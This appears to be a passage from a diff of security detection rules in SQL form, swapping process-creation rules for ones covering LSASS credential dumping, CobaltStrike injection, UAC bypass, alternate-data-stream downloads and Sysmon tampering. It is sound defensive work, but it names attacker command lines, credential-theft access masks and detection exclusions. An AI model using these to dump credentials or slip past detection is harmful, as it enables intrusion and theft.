Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' 
ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects 
the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + 
"attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' 
ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' 
AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", - "status": "experimental", - "description": "Detects suspicious manipulations of default 
accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "status": "test", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR 
CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_net_default_accounts_manipulation.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Base64 MZ Header In CommandLine", - "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "status": "experimental", - "description": "Detects encoded base64 MZ header in the commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR 
CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Console CodePage Lookup Via CHCP", - "id": "7090adee-82e2-4269-bd59-80691e7c6338", - "status": "experimental", - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "author": "_pete_0, TheDFIRReport", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "status": "test", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1614.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_chcp_codepage_lookup.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "HackTool - SharpImpersonation Execution", - "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", - "status": "experimental", - "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "status": "test", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' 
ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_impersonation.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Suspicious Rundll32 Activity Invoking Sys File", - "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_rundll32_sys.yml" + 
"filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", 
"tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 